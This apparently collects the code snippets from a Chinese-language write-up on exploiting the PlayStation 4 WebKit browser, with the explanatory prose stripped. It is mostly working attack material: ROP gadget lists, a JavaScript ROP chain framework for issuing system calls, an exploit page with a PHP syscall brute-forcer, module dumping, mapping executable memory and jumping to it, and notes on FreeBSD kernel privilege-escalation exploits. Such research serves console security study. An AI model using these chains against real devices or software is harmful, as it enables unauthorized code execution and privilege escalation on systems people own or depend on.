mov rax, 0 ret
mov rbx, 0 ret
pop rax ret
add rax, 8 jmp rcx
chain.add("pop rcx", "ret"); chain.add("add rax, 8; jmp rcx");
pop r8 pop r9 ret
; Save registers push rbp mov rbp, rsp push r15 push r14 push r13 push r12 push rbx sub rsp, 18h ; Function body ; Restore registers add rsp, 18h pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp ret
cmp [rax], r12 ret
000000000052BE0D mov eax, [rdx+8] 000000000052BE10 mov [rsi+10h], eax 000000000052BE13 or byte ptr [rsi+39h], 20h 000000000052BE17 ret
000000000052BE14 cmp [rax], r12 000000000052BE17 ret
rp-win-x64 -f mod14.bin --raw=x64 --rop=1 --unique > mod14.txt
setU8to(chain.data + 0, 0xeb); setU8to(chain.data + 1, 0xfe); chain.add(chain.data);
setU8to(moduleBases[webkit], 0);
WebProcess.self libkernel.sprx libSceLibcInternal.sprx libSceSysmodule.sprx libSceNet.sprx libSceNetCtl.sprx libSceIpmi.sprx libSceMbus.sprx libSceRegMgr.sprx libSceRtc.sprx libScePad.sprx libSceVideoOut.sprx libScePigletv2VSH.sprx libSceOrbisCompat.sprx libSceWebKit2.sprx libSceSysCore.sprx libSceSsl.sprx libSceVideoCoreServerInterface.sprx libSceSystemService.sprx libSceCompositeExt.sprx
rax-系统调用号码 rdi-参数1 rsi-参数2 rdx-参数3 r10-参数4 r8-参数5 r9-参数6
this.syscall = function(name, systemCallNumber, arg1, arg2, arg3, arg4, arg5, arg6) { console.log("syscall " + name); this.add("pop rax", systemCallNumber); if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1); if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2); if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3); if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4); if(typeof(arg5) !== "undefined") this.add("pop r8", arg5); if(typeof(arg6) !== "undefined") this.add("pop r9", arg6); this.add("mov r10, rcx; syscall"); }
this.add("pop rbp", stackBase + returnAddress + 0x1400);
rax-0 rdi-系统调用号 rsi-参数1 rdx-参数2 r10-参数3 r8-参数4 r9-参数5
.global syscall syscall: xor rax, rax mov r10, rcx syscall ret
int syscall();int getpid(void) { return syscall(20);}
// Both will get the current process ID: chain.syscall("getpid", 20); chain.syscall("getpid", 0, 20);
/* * Check for the special case of this process running as * or in place of init as pid = 1: */if ((_thr_pid = getpid()) == 1) { /* * Setup a new session for this process which is * assumed to be running as root. */ if (setsid() == -1) PANIC("Can't set session ID"); if (revoke(_PATH_CONSOLE) != 0) PANIC("Can't revoke console"); if ((fd = __sys_open(_PATH_CONSOLE, O_RDWR)) < 0) PANIC("Can't open console"); if (setlogin("root") == -1) PANIC("Can't set login to root"); if (_ioctl(fd, TIOCSCTTY, (char *) NULL) == -1) PANIC("Can't set controlling terminal");}
call getpid mov cs:dword_5B638, eax cmp eax, 1 jnz short loc_2169F call setsid cmp eax, 0FFFFFFFFh jz loc_21A0C lea rdi, aDevConsole ; "/dev/console" call revoke test eax, eax jnz loc_21A24 lea rdi, aDevConsole ; "/dev/console" mov esi, 2 xor al, al call open mov r14d, eax test r14d, r14d js loc_21A3C lea rdi, aRoot ; "root" call setlogin cmp eax, 0FFFFFFFFh jz loc_21A54 mov edi, r14d mov esi, 20007461h xor edx, edx xor al, al call ioctl cmp eax, 0FFFFFFFFh jz loc_21A6C
000000000000DB70 syscall_601 proc near 000000000000DB70 mov rax, 259h 000000000000DB77 mov r10, rcx 000000000000DB7A syscall 000000000000DB7C jb short error 000000000000DB7E retn 000000000000DB7F 000000000000DB7F error: 000000000000DB7F lea rcx, sub_DF60 000000000000DB86 jmp rcx 000000000000DB86 syscall_601 endp
0000000000011D50 mov edi, 10h 0000000000011D55 xor esi, esi 0000000000011D57 mov edx, 1 0000000000011D5C call syscall_601 0000000000011D61 test eax, eax 0000000000011D63 jz short loc_11D6A
0000000000011A28 mov edi, 9 0000000000011A2D xor esi, esi 0000000000011A2F xor edx, edx 0000000000011A31 call syscall_601 0000000000011A36 test eax, eax 0000000000011A38 jz short loc_11A3F
chain.syscall("unknown", 601, 0x10, 0, 1); chain.syscall("unknown", 601, 9, 0, 0);
<body onload="exploit()">
var Sony = 533; chain.syscall("Sony system call", Sony + <?php print($_GET["b"]); ?>, 0, 0, 0, 0, 0, 0); chain.write_rax_ToVariable(0);
if(chain.getVariable(0) == 0x16) window.location.assign("index.php?b=" + (<?php print($_GET["b"]); ?> + 1).toString());
0 - 0x16,“参数无效” 1 - 0xe,“坏地址”
writeString(chain.data, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"); chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);
writeString(chain.data, "aaaaaaaaaa/aaaaaaaaaa/aaaaaaaaaa"); chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);
533 538 557 574 580
加载模块 获取模块的基地址 转储模块
this.call = function(name, module, address, arg1, arg2, arg3, arg4, arg5, arg6) { console.log("call " + name); if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1); if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2); if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3); if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4); if(typeof(arg5) !== "undefined") this.add("pop r8", arg5); if(typeof(arg6) !== "undefined") this.add("pop r9", arg6); this.add(module_bases[module] + address); }
chain.call("sceSysmoduleLoadModule", libSysmodule, 0x1850, 0xb, 0, 0, 0);
var countAddress = chain.data; var modulesAddress = chain.data + 8; // System call 592, getLoadedModules(int *destinationModuleHandles, int max, int *count); chain.syscall("getLoadedModules", 592, modulesAddress, 256, countAddress); chain.execute(function() { var count = getU64from(countAddress); for(var index = 0; index < count; index++) { logAdd("Module handle: 0x" + getU32from(modulesAddress + index * 4).toString(16)); } });
0x0, 0x1, 0x2, 0xc, 0xe, 0xf, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1e, 0x37, 0x59
setU64to(moduleInfoAddress, 0x160); chain.syscall("getModuleInfo", 593, 0x65, moduleInfoAddress); chain.execute(function() { logAdd(hexDump(moduleInfoAddress, 0x160)); });
var name = readString(moduleInfoAddress + 0x8); var codeBase = getU64from(moduleInfoAddress + 0x108); var codeSize = getU32from(moduleInfoAddress + 0x110); var dataBase = getU64from(moduleInfoAddress + 0x118); var dataSize = getU32from(moduleInfoAddress + 0x120);
dump(codeBase, codeSize + dataSize);
setU64to(moduleInfoAddress, 0x1a8); chain.syscall("getDifferentModuleInfo", 608, 0x65, 0, moduleInfoAddress); logAdd(hexDump(moduleInfoAddress, 0x1a8));
writeString(chain.data, "/dev/"); chain.syscall("open", 5, chain.data, 0, 0); chain.write_rax_ToVariable(0); chain.read_rdi_FromVariable(0); chain.syscall("getdents", 272, undefined, chain.data + 0x10, 1028);
0000010: 0700 0000 1000 0205 6469 7073 7700 0000 ........dipsw... 0000020: 0800 0000 1000 0204 6e75 6c6c 0000 0000 ........null.... 0000030: 0900 0000 1000 0204 7a65 726f 0000 0000 ........zero.... 0000040: 0301 0000 0c00 0402 6664 0000 0b00 0000 ........fd...... 0000050: 1000 0a05 7374 6469 6e00 0000 0d00 0000 ....stdin....... 0000060: 1000 0a06 7374 646f 7574 0000 0f00 0000 ....stdout...... 0000070: 1000 0a06 7374 6465 7272 0000 1000 0000 ....stderr...... 0000080: 1000 0205 646d 656d 3000 0000 1100 0000 ....dmem0....... 0000090: 1000 0205 646d 656d 3100 0000 1300 0000 ....dmem1....... 00000a0: 1000 0206 7261 6e64 6f6d 0000 1400 0000 ....random...... 00000b0: 1000 0a07 7572 616e 646f 6d00 1600 0000 ....urandom..... 00000c0: 1400 020b 6465 6369 5f73 7464 6f75 7400 ....deci_stdout. 00000d0: 1700 0000 1400 020b 6465 6369 5f73 7464 ........deci_std 00000e0: 6572 7200 1800 0000 1400 0209 6465 6369 err.........deci 00000f0: 5f74 7479 3200 0000 1900 0000 1400 0209 _tty2........... 0000100: 6465 6369 5f74 7479 3300 0000 1a00 0000 deci_tty3....... 0000110: 1400 0209 6465 6369 5f74 7479 3400 0000 ....deci_tty4... 0000120: 1b00 0000 1400 0209 6465 6369 5f74 7479 ........deci_tty 0000130: 3500 0000 1c00 0000 1400 0209 6465 6369 5...........deci 0000140: 5f74 7479 3600 0000 1d00 0000 1400 0209 _tty6........... 0000150: 6465 6369 5f74 7479 3700 0000 1e00 0000 deci_tty7....... 0000160: 1400 020a 6465 6369 5f74 7479 6130 0000 ....deci_ttya0.. 0000170: 1f00 0000 1400 020a 6465 6369 5f74 7479 ........deci_tty 0000180: 6230 0000 2000 0000 1400 020a 6465 6369 b0.. .......deci 0000190: 5f74 7479 6330 0000 2200 0000 1400 020a _ttyc0.."....... 00001a0: 6465 6369 5f73 7464 696e 0000 2300 0000 deci_stdin..#... 00001b0: 0c00 0203 6270 6600 2400 0000 1000 0a04 ....bpf.$....... 00001c0: 6270 6630 0000 0000 2900 0000 0c00 0203 bpf0....)....... 00001d0: 6869 6400 2c00 0000 1400 0208 7363 655f hid.,.......sce_ 00001e0: 7a6c 6962 0000 0000 2e00 0000 1000 0204 zlib............ 00001f0: 6374 7479 0000 0000 3400 0000 0c00 0202 ctty....4....... 0000200: 6763 0000 3900 0000 0c00 0203 6463 6500 gc..9.......dce. 0000210: 3a00 0000 1000 0205 6462 6767 6300 0000 :.......dbggc... 0000220: 3e00 0000 0c00 0203 616a 6d00 4100 0000 >.......ajm.A... 0000230: 0c00 0203 7576 6400 4200 0000 0c00 0203 ....uvd.B....... 0000240: 7663 6500 4500 0000 1800 020d 6e6f 7469 vce.E.......noti 0000250: 6669 6361 7469 6f6e 3000 0000 4600 0000 fication0...F... 0000260: 1800 020d 6e6f 7469 6669 6361 7469 6f6e ....notification 0000270: 3100 0000 5000 0000 1000 0206 7573 6263 1...P.......usbc 0000280: 746c 0000 5600 0000 1000 0206 6361 6d65 tl..V.......came 0000290: 7261 0000 8500 0000 0c00 0203 726e 6700 ra..........rng. 00002a0: 0701 0000 0c00 0403 7573 6200 c900 0000 ........usb..... 00002b0: 1000 0a07 7567 656e 302e 3400 0000 0000 ....ugen0.4..... 00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
chain.syscall("exit", 1, 0);
//int socket(int domain, int type, int protocol); //socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); chain.syscall("socket", 97, 2, 1, 132);
chain.syscall("mmap", 477, 0, 4096, 1 | 2 | 4, 4096, -1, 0); chain.write_rax_ToVariable(0); chain.read_rdi_FromVariable(0); chain.add("pop rax", 0xfeeb); chain.add("mov [rdi], rax"); chain.add("mov rax, rdi"); chain.add("jmp rax");
chain.syscall("auditon", 446, 0, 0, 0);
if (jailed(td->td_ucred)) return (ENOSYS);
error = mac_system_check_auditon(td->td_ucred, uap->cmd);if (error) return (error);
error = priv_check(td, PRIV_AUDIT_CONTROL);if (error) return (error);
if ((uap->length <= 0) || (uap->length > sizeof(union auditon_udata))) return (EINVAL);
FreeBSD 9.0-9.1 mmap / ptrace :特权升级漏洞利用,因为如上所述,我们无法访问ptrace系统调用。 FreeBSD 9.0 : Intel SYSRET内核特权升级漏洞利用,由于PS4使用AMD处理器,因此无法正常工作。 FreeBSD内核:多个漏洞 ,也许只有第一个漏洞有用,但其他两个依赖于 SCTP 套接字,而SCTP 套接字已被 PS4 内核禁用。
chain.syscall("getlogin", 49, chain.data, 17);
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
72 6f 6f 74 00 fe ff ff 08 62 61 82 ff ff ff ff 00